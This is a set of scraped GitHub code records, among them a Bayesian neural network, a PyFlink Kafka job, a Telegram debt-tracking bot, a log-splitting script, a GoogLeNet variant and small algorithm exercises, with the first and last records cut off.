self.layers = tf.keras.Sequential([\n tfp.layers.DenseFlipout(\n # one output for estimating the reward\n 1,\n # the _prior_ distribution over our weights (even though it says posterior, it is the prior in the bayes rule sense)\n # this creates a vector of learnable independent normal distributions\n kernel_posterior_fn=tfp_layers_util.default_mean_field_normal_fn(\n # initialize the mean of the normal distributions randomly so that the means are slightly negative (pessimistic init)\n loc_initializer=tf.random_normal_initializer(mean=self.hidden_layer_mean, stddev=self.hidden_layer_stddev) # prior mean and stddev of nodes in hidden layer\n ),\n # regularize our weights by pulling them towards a N(0, 1e-8) distribution\n # cannot have a N(0, 0) distribution, so pull them towards something with no variance\n kernel_prior_fn=KernelPrior(self.outer_layer_sttdev).output, # prior stddev over y's (outputs, in our case th rewards)\n # Don't use a bias weight here\n bias_posterior_fn=None, # set to None to keep everything local (local variance over all features)\n )\n ])\n\n # make predictions by sampling weights from the posterior and multiplying phi(S, A)\n self.predictions = self.layers(self.X)\n # model the variance of the noise on Y with a learnable normal distribution\n std = VariationalParameter('noise_std', [1])\n # build the distribution over Y ~ N(W*phi(S, A), std)\n pred_dist = tfd.Normal(loc=self.predictions, scale=std.sample())\n\n # Build the loss function\n # get the log probability of observing this value of Y given our parameters: P(Y | theta)\n log_prob = pred_dist.log_prob(self.Y)\n # make sure this log probability isn't nan (bug in tensorflow when variance approaches 0. if it is nan, just set it to zero)\n non_nan = tf.where(tf.is_nan(log_prob), tf.zeros_like(log_prob), log_prob)\n # get the mean over the outputs (only 1 output for now so this isn't really necessary, but it is good to be generic)\n neg_log_prob = -tf.reduce_mean(non_nan)\n # The KL-divergence is what trains the variance over the weights, the neg_log_prob is the loss over the mean\n # The KL-divergence is added as a \"regularizer\" to the layers as a hack to make this work with the tensorflow infrastructure (that's how tfp works)\n kl_div = sum(self.layers.losses)\n # the ELBO loss is just the sum of the loss over the variance (kl-div) and the loss over the mean (neg_log_prob)\n elbo_loss = neg_log_prob + kl_div\n\n # minimize the loss using some optimizer (adam with small learning rate seems to work well)\n optimizer = tf.train.AdamOptimizer(0.01)\n self.train = optimizer.minimize(elbo_loss)\n\n # initialize the tensorflow graph and get initial values of the weights\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n init_op.run()\n\n # makes sure that the X passed in is the right shape and size\n # if we accidentally pass in a tensor or vector, this should handle that case\n def normalizeXShape(self, x):\n return x.reshape((math.ceil(x.size / self.features), self.features))\n\n def fit(self, x, y, epochs=1):\n x = self.normalizeXShape(x)\n y = y.reshape((len(y), 1))\n feed = {self.X: x, self.Y: y}\n for _ in range(epochs):\n self.train.run(feed_dict=feed)\n\n def sample(self, x, samples=1000):\n x = self.normalizeXShape(x)\n m = np.tile(x, [samples, 1])\n feed = {self.X: m}\n p = self.predictions\n s = np.array(p.eval(feed_dict=feed)).flatten()\n s.sort()\n return s\n\nif __name__ == \"__main__\":\n print(tf.__version__)\n sess = tf.InteractiveSession()\n tf.set_random_seed(42)\n np.random.seed(42)\n #training-data:\n x = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.float32)\n y = np.array([[0], [0], [0]], dtype=np.float32)\n\n # run model\n f = BNN(3)\n s = f.sample(np.array([[1., 0., 0.]]))\n # print(s)\n print(\"Untrained mean and var\", np.mean(s), np.std(s)**2)\n print(\"Weights\", f.layers.get_weights())\n f.fit(x, y, epochs=100)\n s = f.sample(np.array([[1., 0., 0.]]))\n print(np.mean(s), np.std(s)**2)\n print(f.layers.get_weights())\n","repo_name":"dchui1/659-project","sub_path":"src/bayesian_inference/BNN.py","file_name":"BNN.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74362694560","text":"from pyflink.common.serialization import SimpleStringSchema\nfrom pyflink.common.typeinfo import Types\nfrom pyflink.datastream import StreamExecutionEnvironment, RuntimeExecutionMode\nfrom pyflink.datastream.connectors.kafka import KafkaSource, KafkaSink\nfrom pyflink.datastream.execution_mode import ExecutionMode\nfrom pyflink.table.descriptors import Kafka\nfrom pyflink.table import StreamTableDescriptor\n\ndef main():\n env = StreamExecutionEnvironment.get_execution_environment()\n env.set_parallelism(1)\n env.set_runtime_mode(RuntimeExecutionMode.BATCH)\n\n # Kafka source configuration\n source = KafkaSource.builder() \\\n .set_bootstrap_servers(\"localhost:9092\") \\\n .set_topics(\"input-topic\") \\\n .set_group_id(\"my-group\") \\\n .set_starting_offsets(\"earliest\") \\\n .set_value_only_deserializer(SimpleStringSchema()) \\\n .build()\n\n # Define the transformation (e.g., word count)\n result = env.from_source(source, watermark_strategy=None, source_name=\"Kafka Source\") \\\n .flat_map(lambda x: x.split()) \\\n .map(lambda x: (x, 1), output_type=Types.ROW([Types.STRING(), Types.INT()])) \\\n .key_by(lambda x: x[0]) \\\n .reduce(lambda x, y: (x[0], x[1] + y[1]))\n\n # Kafka sink configuration\n sink = KafkaSink.builder() \\\n .set_bootstrap_servers(\"localhost:9092\") \\\n .set_record_serializer(\n KafkaRecordSerializationSchema.builder()\n .set_topic(\"output-topic\")\n .set_value_serialization_schema(SimpleStringSchema())\n .build()\n ) \\\n .set_delivery_guarantee(DeliveryGuarantee.AT_LEAST_ONCE) \\\n .build()\n\n result.sink_to(sink)\n\n # Execute the job\n env.execute(\"Kafka Source and Sink Example\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"razaviah/Real-Time-Time-Series-Data-Prediction","sub_path":"flink_job.py","file_name":"flink_job.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26145087866","text":"from aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils import executor\nimport re\nimport os\nfrom database import engine\n\nfrom crud import *\n\n\n\nTOKEN = os.getenv(\"TG_BOT_TOKEN\")\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\n\nreg_exp_duty_to_me = r'(@.{3,}) приторчал(а)? мне ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_payday = r'(@.{3,}) вернул(а)? мне ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_my_duty = r'Я задолжал(а)? (@.{3,}) ([0-9]{,5}(.[0-9]{1,2})?)'\nreg_exp_wipe_duty = r'Прощаю долг (@.{3,})'\n\n\n@dp.message_handler(commands=['start'])\nasync def send_welcome(msg: types.Message):\n await msg.answer(f'Я бот-счетовод. Приятно познакомиться, {msg.from_user.username}.\\nДля просмотра команд введите /help')\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n if msg.from_user.username == 'brochachox':\n await msg.answer(\"Не забудь про должок Лёхе;)\")\n\n\n\n@dp.message_handler(commands=['help'])\nasync def send_docs(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n await msg.answer(\n\"\"\"\n*\\<@Ник\\> приторчал\\(а\\) мне \\<Сума\\>* \\- _добавить долг вам_\n\n*Я задолжал\\(а\\) \\<@Ник\\> \\<Сума\\>* \\- _добавить ваш долг_\n\n*Прощаю долг \\<@Ник\\>* \\- _простить долг_\n\n*\\<@Ник\\> вернул\\(а\\) мне \\<Сума\\>* \\- _вычесть суму из долга_\n\n*Кому я задолжал\\(а\\)\\?* \\- _посмотреть свои долги_\n\n*Кто мне должен\\?* \\- _посмотреть должников_\n\n*Сколько мне должны\\?* \\- _посмотреть сумарный долг тебе_\n\n*Сколько я задолжал\\(а\\)\\?* \\- _посмотреть свой сумарный долг_\n\"\"\", parse_mode=\"MarkdownV2\")\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_duty_to_me, msg.text))\nasync def add_duty_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_duty_to_me, msg.text)\n debtor = m.group(1)\n amount = m.group(3)\n duty = add_duty(str(\"@\"+msg.from_user.username), str(debtor), float(amount))\n if not duty:\n await msg.answer(\"Вы в рассчете\")\n else:\n user = get_user_info(duty.debtor)\n if user:\n await bot.send_message(user.chat_id, f'Вы заторчали {duty.lender} {duty.amount}')\n await msg.answer(f'У {debtor} должок {duty.amount}')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_my_duty, msg.text))\nasync def add_my_duty(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_my_duty, msg.text)\n lender = m.group(2)\n amount = m.group(3)\n duty = add_duty(str(lender), str(\"@\"+msg.from_user.username), float(amount))\n if not duty:\n await msg.answer(\"Ты ничего не должен.\")\n else:\n await msg.answer(f'Ты {\"должна\" if m.group(1) else \"должен\"} {duty.lender} {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_payday, msg.text))\nasync def get_payment(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_payday, msg.text)\n debtor = m.group(1)\n amount = m.group(3)\n await msg.answer(payday(str(\"@\"+msg.from_user.username), debtor, float(amount)))\n\n\n@dp.message_handler(lambda msg: re.fullmatch(r'Кому я задолжал(а)?[\\?]', msg.text))\nasync def check_my_duties(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(r'Кому я задолжал((а)?)[\\?]', msg.text)\n duties = get_my_duties(str(\"@\"+msg.from_user.username))\n if not duties:\n await msg.answer(\"Пока долгов нету)\")\n else:\n for duty in duties:\n await msg.answer(f'Ты {\"должна\" if m.group(1) else \"должен\"} {duty.lender} {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: re.fullmatch(r'Сколько я задолжал(а)?[\\?]', msg.text))\nasync def count_my_duties(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n total_duty = count_my_total_duty(str(\"@\"+msg.from_user.username))\n if total_duty:\n await msg.answer(f'Ты торчишь {total_duty}')\n else:\n await msg.answer(\"Никому ты не должен\")\n\n\n@dp.message_handler(lambda msg: msg.text == 'Кто мне должен?')\nasync def check_duties_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n duties = get_duties_for_me(str(\"@\"+msg.from_user.username))\n if not duties:\n await msg.answer(\"Пока должников нету.\")\n else:\n for duty in duties:\n await msg.answer(f'У {duty.debtor} должок {duty.amount}.')\n\n\n@dp.message_handler(lambda msg: msg.text == 'Сколько мне должны?')\nasync def count_duties_to_me(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n total_duty = count_total_duty_to_me(str(\"@\"+msg.from_user.username))\n if total_duty:\n await msg.answer(f'Тебе торчат {total_duty}')\n else:\n await msg.answer(\"Никто тебе не должен\")\n\n\n@dp.message_handler(lambda msg: re.fullmatch(reg_exp_wipe_duty, msg.text))\nasync def wipe_away_a_dept(msg: types.Message):\n sign_up_user(str(\"@\"+msg.from_user.username), msg.from_user.id, msg.chat.id)\n m = re.match(reg_exp_wipe_duty, msg.text)\n debtor = m.group(1)\n if await wipe_away_the_dept(str(\"@\"+msg.from_user.username), debtor, bot):\n await msg.answer(\"Долг прощен.\")\n else:\n await msg.answer(\"Так он тебе и не должен нихрена.\")\n\n\nif __name__ == '__main__':\n if not os.path.exists('database.sqlite3'):\n print(\"Creating db...\")\n tables.Base.metadata.create_all(engine)\n print(\"Db has been created.\")\n executor.start_polling(dp)\n","repo_name":"Cheyzie/TGDebtBot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42222408170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nv0.005 12.07.2018 List and datestring has more firmly defined\nv0.004 06.07.2018 15:30 Function splittings now works with AM-sensor\nv0.003 06.07.2018 checkfolder now asks for sensor\nv0.002 24.05.2018 Now sucessfully splits a certain string in temp.log to its own file. Also removes noise!\nv0.001 Inital code, copied from merge.py\n'''\n\n\"\"\"\nSPLITS temp.log with the previous day, and only that day\nMoves that portio from merge.log to its own folder and file\n\nsplit.py (this) has the responsibillity for date-cehcking\n\"\"\"\n\"\"\"\ndef checkfolder CREATES files\n\"\"\"\n\nfrom colorama import init\ninit()\nfrom colorama import Fore, Back, Style\ninit(autoreset=True)\n\nimport os\n\n\ndef version():\n\treturn \"v0.001\"\n\n# Assume temp.log is todays log, but import/read/merge yesterday\n\nfrom datetime import datetime\n\n# 12.07.2018\n# Tror ikke denne heller brukes noe sted \ndef today():\n\td = datetime.now().isoformat()\n\te = d.find('T')\n\t# print(\"e: \"+str(e))\n\n\tf = d[0:e]\n\tprint(\"f: \"+str(f))\n\treturn(f)\n\ndef extractdate(f):\n\t\"\"\" 24.05.2018: Tror ikke jeg bruker denne \"\"\"\n\t\n\tyear = None\n\tmonth = None\n\tday = None\n\tprint(\"extractdate start with string: \"+str(f))\n\n\t# error checks\n\t\n\tif not len(f) >= 10:\n\t\tprint(\"String ikke lang nok\")\n\t\treturn None\n\t\n\tif not f.count('-') == 2:\n\t\tprint(\"Feil i string, forventet to bindestreker\")\n\t\treturn None\n\t\n\twhile (year is None):\n\t\twhile (month is None):\n\t\t\twhile (day is None):\n\t\t\t\t# print(\"Finn dagen\")\n\t\t\t\tday = f[8:10]\n\t\t\t\t# print(day)\n\t\t\t# print(\"Finn måneden\")\n\t\t\tmonth = f[5:7]\n\t\t\t# print(month)\n\t\t# print(\"Finn året\")\n\t\tyear = f[0:4]\n\t\t# print(year)\n\treturn (year,month,day)\n\n\tdagensdato = extractdate(f)\n\tprint(\"Dagens dato er: \"+str(dagensdato))\n\t\t\n\t# 19.03.2018 - Finne øverste dato og sjekk om folder finnes\n\n\twith open('temp.log') as fl:\n\t\tfirst_line = fl.readline().strip()\n\n\tprint(\"Første llinje: \"+str(first_line))\n\n\tfirstdate = extractdate(first_line)\n\n\t# Ønsker at det skal være tuple\n\t#print(\"Type: \"+str(type(firstdate)))\n\n\tprint(\"Øverste dato kan være: \"+str(firstdate))\n\n\t# Sjekk for folder\n\n\t# Allerede importert\n\t# import os\n\n\tcwd = os.getcwd()\n\tprint(\"Current Working Directory: \"+str(cwd))\n\n# fds = First Date String\ndef splittings(datefile,fds,logfile):\n\timport time\n\tprint(\"[Splittings] Will split \"+str(fds)+\" in \"+str(logfile)+\" and put it into \"+str(datefile))\n\t\n\tcwd = os.getcwd()\n\tprint(\"Current Working Directory: \"+str(cwd))\n\t\n\t# Sane checks\n\t\n\tfs = os.path.getsize(logfile)\n\tif (fs == 0):\n\t\tprint(\"FATAL ERROR, 0 bytes in logfile!\")\n\t\texit(666)\n\telse:\n\t\tprint(\"Current size of logfile is: \"+str(fs))\n\n\t# Det er ok om filen (datefile) finnes, men ikke hvis det er innhold\n\t# Vil alltid finnes pga checkfolder()\n\n\tfsd = os.path.getsize(datefile)\n\tif (fsd > 0): \n\t\tprint(\"FATAL ERROR, >0 bytes in datefile! \"+str(fsd)+\" bytes\")\n\t\ttime.sleep(5)\n\t\treturn(False)\n\t\n\t# Åpner original logfile som read\n\tlf = open(logfile,'r')\n\t\n\t# Åpner destination som write\n\tdest = open(datefile,'w')\n\tdestname = datefile\n\t\n\t# Åpner backup templog2.log som write\n\tlog2 = open(\"filtered.log\",'w')\n\tlog2name = \"/home/pi/pyscript/filtered.log\"\n\t\n\t# temp log file\n\tcount = 0\n\tantall = 0\n\t\n\t# Statistikk\n\twith open(logfile) as telle:\n\t\tfor line in telle:\n\t\t\tif fds in line:\n\t\t\t\tantall += 1\n\n\tprint(\"[Splittings] We have \"+str(antall)+\" occurances of the requested date\")\n\t\n\tif (antall == 0):\n\t\tprint(\"Fant ikke det jeg skulle, return False\")\n\t\treturn(False)\n\t\n\twith open(logfile) as tlf:\n\t\tfor line in tlf:\n\t\t\tcount = count+1\n\t\t\tif fds in line:\n\t\t\t\t# print(\"datostring funnet - linje \"+str(count))\n\t\t\t\tdest.write(line)\n\t\t\telse:\n\t\t\t\tif (count < antall):\n\t\t\t\t\tprint(\"Datostring ikke funnet - linje \"+str(count))\n\t\t\t\tif (len(line) > 30): \n\t\t\t\t\t# print(\"Writing to log2\")\n\t\t\t\t\tlog2.write(line)\n\t\t\t\telse: \n\t\t\t\t\tprint(Style.BRIGHT+Fore.RED+\"Error, line not long enough! \"+str(line).rstrip())\n\t\t\t\t\t# exit(\"sjekk line length\")\n\t\t\t\t\n\tprint(\"Done splitting files, sleeping for 3 seconds\")\n\ttime.sleep(3)\n\n\tdest.flush()\n\tdest.close()\n\t\n\tlog2.flush()\n\tlog2.close()\n\t\n\tfs2 = os.path.getsize(log2name)\n\tif (fs2 == 0): print(\"FATAL ERROR, 0 bytes!\"), exit(666)\n\t\n\tprint(\"Current size of filtered.log is: \"+str(fs2))\n\n\n\tprint(\"Renaming filtered.log to \"+str(logfile))\n\tos.rename(\"filtered.log\",logfile)\n\tprint(\"Renamed filtered.log to \"+str(logfile))\n\n\tprint(\"Rename succesful?\")\n\tprint(\"Gikk fra \"+str(fs)+\" bytes til \"+str(fs2)+\" bytes!\")\n\t\n\tdiff = fs-fs2\n\tprint(\"Differansen mellom gammel og ny logg: \"+str(diff))\n\t\n\tfs3 = os.path.getsize(datefile)\n\tprint(fs3)\n\t\n\tif (fs3 == diff): \n\t\tprint(Style.BRIGHT+Fore.GREEN+\"Veldig awesome, alt stemmer!\")\n\t\treturn(True)\n\telse: \n\t\tprint(\"fs3 er ikke det samme som diff\")\n\t\tprint(\"Sleeing for 20 seconds\")\n\t\ttime.sleep(20)\n\t\treturn(False)\n\t\n\t# 10.07.2018: Scriptet er egentlig avsluttet\n\t\n\t# True hvis ulik størrelse, endring ble gjort\n\t# False hvis samme størrelse, endring ble ikke gjort\n\tif (fs != fs2): return(True)\n\telse: return(False)\n\n\n# No longer needs dagensdato in arguments, just firstdate\ndef checkfolder(firstdate,sensor):\n\tprint(\"[Checkfolder]: \"+str(firstdate)+\" Sensor: \"+str(sensor))\n\t\n\t# print(\"[CheckFolder]: \"+str(firstdate)+\" \"+str(dagensdato))\n\n\t# Ting er visst ikke globale...\n\tcwd = os.getcwd()\n\t\n\t\n\t# year folder, month folder, \"filename.log\"\n\tyf = cwd+\"/\"+sensor+\"/\"+firstdate[0]\n\tym = cwd+\"/\"+sensor+\"/\"+firstdate[0]+\"/\"+firstdate[1]\n\tdatefile = ym+\"/\"+str(firstdate[2]+\".log\")\n\tprint(\"Datefile is: \"+str(datefile))\n\n\tprint(Style.BRIGHT+\"yf: \"+Style.NORMAL+str(yf))\n\tprint(Style.BRIGHT+\"ym: \"+Style.NORMAL+str(ym))\n\tprint(Style.BRIGHT+\"datefile: \"+Style.NORMAL+str(datefile))\n\n\tif not os.path.exists(yf):\n\t\tos.makedirs(yf)\n\t\tprint(\"FOLDER \"+str(yf)+\" created!\")\n\n\tif not os.path.exists(ym):\n\t\tos.makedirs(ym)\n\t\tprint(\"FOLDER \"+str(ym)+\" created!\")\n\n\tif not os.path.isfile(datefile):\n\t\topen(datefile,'x')\n\t\tprint(\"FILE \"+str(datefile)+\" created!\")\n\tstring = firstdate[0]+\"-\"+firstdate[1]+\"-\"+firstdate[2]\n\t\n\tfs = os.path.getsize(datefile)\n\tprint(\"Datefile \"+Style.BRIGHT+Fore.GREEN+\"exists: \"+Fore.WHITE+str(datefile)+\" Size: \"+str(fs))\n\t\n\t# exit(\"Check for size\")\n\t\n\t# 24.05.2018: Aner ikke hvorfor det er return her\n\t# return(datefile,string)\n\n\t# 24.05.2018: Som de er, siden funksjonen er ble kalt\n\treturn(datefile,True)\n\t\n\n# Sometimes, it is more fun to write things twice\n\ndef splittemp(firstdatel,lastdatel,sensor):\n\t# print(\"Type recieved: \"+str(type(firstdate)))\n\tassert(type(firstdatel) is list),\"splittemp did not recieve type list (but maybe string)\"\n\t\n\t# Only 1 argument needed, firstdate not lastdate\n\tdatefile,b = checkfolder(firstdatel,sensor)\n\t\n\t# First Date String\n\tfds = '-'.join(firstdatel)\n\tprint(\"[SplitTemp]: Firstdatel - fds - datefile - b\")\n\tprint(firstdatel,fds,datefile,b)\n\t\n\tlogfile = sensor+\"/temp.log\"\n\tresult = splittings(datefile,fds,logfile)\n\tprint(\"result (to be returned): \"+str(result))\n\t\n\treturn(result)\n\nfrom datetime import datetime\n\n# Mine egne funksjoner\ndef main():\n\t# 04.07.2018: Hvis split.py blir executa, så skjer det egentlig ingenting her\n\tfrom plotting import today\n\tfrom plotting import extractdate\n\n\tprint(Style.BRIGHT+\"Split \"+version()+Style.NORMAL+\" starting\")\n\n\tf = today()\n\tif f is None: \n\t\tprint(\"F finnes ikke\")\n\t\texit()\n\tdagensdato = extractdate(f)\n\tprint(\"Dagens dato er: \"+str(dagensdato))\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","repo_name":"mazter00/urdal","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72246635682","text":"'''GoogLeNet with PyTorch.'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport models.zhushuifa as zhushuifa\n\nclass Inception(nn.Module):\n def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):\n super(Inception, self).__init__()\n # 1x1 conv branch\n self.b1 = nn.Sequential(\n nn.Conv2d(in_planes, n1x1, kernel_size=1),\n nn.BatchNorm2d(n1x1),\n nn.ReLU(True),\n )\n\n # 1x1 conv -> 3x3 conv branch\n self.b2 = nn.Sequential(\n nn.Conv2d(in_planes, n3x3red, kernel_size=1),\n nn.BatchNorm2d(n3x3red),\n nn.ReLU(True),\n nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),\n nn.BatchNorm2d(n3x3),\n nn.ReLU(True),\n )\n\n # 1x1 conv -> 5x5 conv branch\n self.b3 = nn.Sequential(\n nn.Conv2d(in_planes, n5x5red, kernel_size=1),\n nn.BatchNorm2d(n5x5red),\n nn.ReLU(True),\n nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),\n nn.BatchNorm2d(n5x5),\n nn.ReLU(True),\n nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),\n nn.BatchNorm2d(n5x5),\n nn.ReLU(True),\n )\n\n # 3x3 pool -> 1x1 conv branch\n self.b4 = nn.Sequential(\n nn.MaxPool2d(3, stride=1, padding=1),\n nn.Conv2d(in_planes, pool_planes, kernel_size=1),\n nn.BatchNorm2d(pool_planes),\n nn.ReLU(True),\n )\n\n def forward(self, x):\n y1 = self.b1(x)\n y2 = self.b2(x)\n y3 = self.b3(x)\n y4 = self.b4(x)\n return torch.cat([y1,y2,y3,y4], 1)\n\n\nclass GoogLeNetW(nn.Module):\n def __init__(self, mode = True, dim = 0):\n super(GoogLeNetW, self).__init__()\n self.zhushui = zhushuifa.zhushuilayer(0, dim)\n self.pingjun = zhushuifa.pingjunlayer(0, dim)\n self.mode = mode\n\n self.pre_layers = nn.Sequential(\n nn.Conv2d(3, 192, kernel_size=3, padding=1),\n nn.BatchNorm2d(192),\n nn.ReLU(True),\n )\n\n self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)\n self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)\n\n self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)\n\n self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)\n self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)\n self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)\n self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)\n self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)\n\n self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)\n self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)\n\n self.avgpool = nn.AvgPool2d(8, stride=1)\n self.linear = nn.Linear(1024, 10)\n\n def forward(self, x):\n out = self.pre_layers(x)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a3(out)\n out = self.b3(out)\n out = self.maxpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a4(out)\n out = self.b4(out)\n out = self.c4(out)\n out = self.d4(out)\n out = self.e4(out)\n out = self.maxpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a5(out)\n out = self.b5(out)\n out = self.avgpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\ndef test():\n net = GoogLeNetW()\n x = torch.randn(1,3,32,32)\n y = net(x)\n print(y.size())\n\n# test()\n","repo_name":"chalesguo/Info-SGD","sub_path":"models/googlenetwith.py","file_name":"googlenetwith.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32385083549","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# node에 start ~ end정보 저장\ndef init_tree(node, start, end):\n if start == end:\n tree[node] = numbers[start]\n return tree[node] % 1000000007\n else:\n mid = (start + end) // 2\n tree[node] = init_tree(node * 2, start, mid) * init_tree(\n node * 2 + 1, mid + 1, end\n )\n return tree[node] % 1000000007\n\n\n# node: 현재 노드, start, end: 현재 노드 구간, l, r: 구하고자 하는 구간\ndef segment(node, start, end, l, r):\n if start > r or end < l:\n return 1\n if l <= start and end <= r:\n return tree[node] % 1000000007\n\n mid = (start + end) // 2\n return (\n segment(node * 2, start, mid, l, r)\n * segment(node * 2 + 1, mid + 1, end, l, r)\n % 1000000007\n )\n\n\n# node: 현재 노드, start, end: 현재 노드 구간, index : 변경하고자 하는 인덱스, value: 변경하고자 하는 목표값\ndef update(node, start, end, index, value):\n if not (start <= index <= end):\n return\n\n if start == end:\n tree[node] = value\n return\n\n mid = (start + end) // 2\n update(node * 2, start, mid, index, value)\n update(node * 2 + 1, mid + 1, end, index, value)\n\n tree[node] = (tree[node * 2] * tree[node * 2 + 1]) % 1000000007\n\n\nn, m, k = map(int, input().split())\nnumbers = [int(input()) for _ in range(n)]\n\ntree = [None] * (4 * n)\ninit_tree(1, 0, n - 1)\n\nfor _ in range(m + k):\n a, b, c = map(int, input().split())\n if a == 1:\n # b번째 수 c로 바꾸기\n update(1, 0, n - 1, b - 1, c)\n numbers[b - 1] = c\n elif a == 2:\n # b부터 c까지의 곱 구하기\n print(segment(1, 0, n - 1, b - 1, c - 1))\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/11505_구간곱구하기.py","file_name":"11505_구간곱구하기.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43584586451","text":"import re\n\n\"\"\"Some application utility functions\"\"\"\n\n\ndef slugify(s):\n \"\"\"\n Simplifies ugly strings into something URL-friendly.\n From: http://blog.dolphm.com/slugify-a-string-in-python/\n \"\"\"\n s = s.lower()\n for c in [' ', '-', '.', '/']:\n s = s.replace(c, '_')\n s = re.sub('\\W', '', s)\n s = s.replace('_', ' ')\n s = re.sub('\\s+', ' ', s)\n s = s.strip()\n s = s.replace(' ', '-')\n\n return s\n\n\ndef form_has(form, key):\n \"\"\"Convenience function for checking whether a form\n request contains a non-empty attribute\n\n Arguments:\n form (werkzeug.datastructures.MultiDict) -- The form request dictionary\n key (string) -- The dictionary key to check\n\n Returns:\n boolean -- Whether the attribute exists and is non-empty\n \"\"\"\n\n return key in form and form[key].strip()\n","repo_name":"christiaan-lombard/udacityproject-item-catalog","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25679752766","text":"# იუზერს ვეკითხებით სახელს გვარს შეფასებას\n#ვამოწმებთ სახელში 2ზე მეტი ასო აქვს ი\n# გვარი მთავრდება შვილზე\n# ქულა მეტია 50 ზე\n# დაპრინტოს დაფორმატებული ტექსტი თქვენ მოიგეთ სახელი გვარი ქულა\n\n#else\n# თქვენ წააგეთ სახელი გავარი ქულა\n\nname = input(\"sheitanet tkveni saxeli: \")\nsurname = input(\"sheitanet tkveni gvari: \")\ngrade = int(input(\"sheitanet qula: \"))\n\nwin =(\"you win , saxeli {}, gvari {}, qula {}\")\nloss =(\"you loss, saxeli {}, gvari {}, qula {}\")\n\nif name.count(\"i\")==2 and (surname[-6:])==\"shvili\" and grade >50:\n print(win.format(name,surname,grade))\nelse:\n print(loss.format(name,surname,grade))\n","repo_name":"geluch/geluch","sub_path":"day 2/day2_1/nomework.py","file_name":"nomework.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35073509905","text":"from egzP4btesty import runtests \r\n\r\nclass Node:\r\n def __init__(self, key, parent):\r\n self.left = None\r\n self.right = None\r\n self.parent = parent\r\n self.key = key\r\n self.x = None\r\n\r\n\r\ndef sol(root, T):\r\n def maximum(x):\r\n while x.right:\r\n x = x.right\r\n return x.key\r\n\r\n def minimum(x):\r\n while x.left:\r\n x = x.left\r\n return x.key\r\n\r\n def succ(x):\r\n if x.right:\r\n return minimum(x.right)\r\n else:\r\n while x.parent.key < x.key:\r\n 